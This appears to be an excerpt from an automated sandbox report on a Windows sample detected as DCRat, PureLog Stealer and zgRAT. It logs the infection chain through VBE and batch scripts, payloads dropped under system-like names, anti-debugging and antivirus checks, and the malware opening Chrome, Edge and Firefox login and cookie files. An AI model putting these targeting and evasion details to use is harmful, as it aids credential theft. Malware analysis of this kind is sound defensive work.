Process information queried: ProcessInformation

Jump to behavior

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

Code function: 5_2_00007FF84904340F rdtsc

5_2_00007FF84904340F

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0101F838

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_01027DEE mov eax, dword ptr fs:[00000030h]

0_2_01027DEE

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_0102C030 GetProcessHeap,

0_2_0102C030

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0101F9D5 SetUnhandledExceptionFilter,	0_2_0101F9D5
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0101F838
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0101FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0101FBCA
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_01028EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01028EBD

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\providerBrowserruntimeCrt\Providerbroker.exe "C:\providerBrowserruntimeCrt/Providerbroker.exe"	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"	Jump to behavior

Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"?","Crypto Extensions (fff5)":"?","Crypto Clients (fff5)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\providerBrowserruntimeCrt","SASSUT (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7503 / -74.0014"]
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7503 / -74.0014"]
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"?","Crypto Extensions (fff5)":"?","Crypto Clients (fff5)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\providerBrowserruntimeCrt","SASSUT (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New Yor

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_01010723 cpuid

0_2_01010723

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0101AF0F

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Queries volume information: C:\providerBrowserruntimeCrt\Providerbroker.exe VolumeInformation	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Queries volume information: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe VolumeInformation	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_0101DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0101DF1E

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_0100B146 GetVersionExW,

0_2_0100B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3319845623.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Providerbroker.exe PID: 6204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BSlvAOjamepaXWJMhY.exe PID: 5148, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9FwQYJSj4N.exe, type: SAMPLE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 9FwQYJSj4N.exe, type: SAMPLE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
